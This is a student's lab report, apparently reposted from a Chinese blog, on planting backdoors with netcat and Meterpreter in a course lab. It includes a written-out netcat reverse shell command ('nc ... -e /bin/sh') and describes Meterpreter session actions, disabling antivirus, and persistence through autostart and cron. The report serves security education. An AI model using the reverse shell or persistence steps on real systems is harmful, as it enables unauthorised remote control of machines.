20145313张雪纯网络攻防第二次实验

问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
解压压缩文件时里面含有后门程序。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
通过捆绑其他文件、设置开机自启动、设置定时任务、自己误点等。
(3)Meterpreter有哪些给你映像深刻的功能?
有大量控制被控主机的功能。获取键盘输入可能导致密码泄露。
(4)如何发现自己有系统有没有被安装后门?
啊这个只好寄希望与杀毒软件和防火墙了。。。

后门的概念

一类恶意程序,能够使得攻击者获取电脑控制权限。
这次实验中用到的后门程序是netcat和meterpreter。

首先测试是否连接成功并查询ip地址

885194-20170315170233057-1510837018.png

使用netcat使Windows获得Linux Shell

注意:后门程序可以使用主动连接和反弹连接的方式,但是主动连接方式容易被防火墙拦截,所以大多使用反弹连接的方式,即被控方主动连接控制端。反弹连接是相关ip参数设置为控制方ip。

  • 在Windows中打开监听
    885194-20170315165900245-9781548.png
  • 在Linux中输入oot@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh反弹连接Windows。
  • Windows获取Linux的shell,测试成功
    885194-20170315165809604-2022766136.png

    利用Meterpreter生成后门程序,使得Linux获得Windows的shell

  • 首先使用KiTTYPortable.exe生成后门程序。
    885194-20170315170316588-537060822.png

  • 把程序复制到Windows系统中。复制之前要先关闭杀毒软件以及防火墙,以防程序被杀。
  • 在Linux中启动msf
    885194-20170315170429916-74933461.png

  • 对msf进行基本配置,在Windows中双击运行后门程序,反弹连接至Linux
    885194-20170315170629588-472732177.png

  • 连接成功后获取Windows的shell
    885194-20170315170658729-143288386.png

  • 测试help命令
    885194-20170315170840791-425162619.png

  • 获取命令行界面
    885194-20170315170906854-854527800.png

  • 获取ruby交互界面
    885194-20170315170924057-565045502.png

  • 查询运行进程
    885194-20170315170939354-366691693.png

  • 尝试截屏
    885194-20170315170952823-1896397484.png

  • 查看post模块
    885194-20170315171019635-7226079.png

  • 检查被控机是否是虚拟机
    885194-20170315171036791-830171140.png

  • 导出密码(失败)
    885194-20170315171059604-1882277137.png

  • 尝试安装Meterpreter(Persistence)到目标机失败,没有成功的输出
    885194-20170315171124088-567921382.png

  • run metsvc不成功
    885194-20170315171146448-1461800800.png

天啦噜

  • 尝试提权显示环境不正确
    885194-20170315173825026-2084489167.png

设置后门程序自启动

  • 在Windows中设置后门启动
    885194-20170315171221557-2050754655.png

  • 使用crontab在Linux中设置自动执行定时任务,编辑方法和vim相同。
    885194-20170315171328588-2111845546.png

  • 查看已编辑的自动执行任务,每小时的20分即会执行。另一台主机持续侦听即可获取shell。
    885194-20170315171355885-1829346512.png

转载于:https://www.cnblogs.com/entropy/p/6555263.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值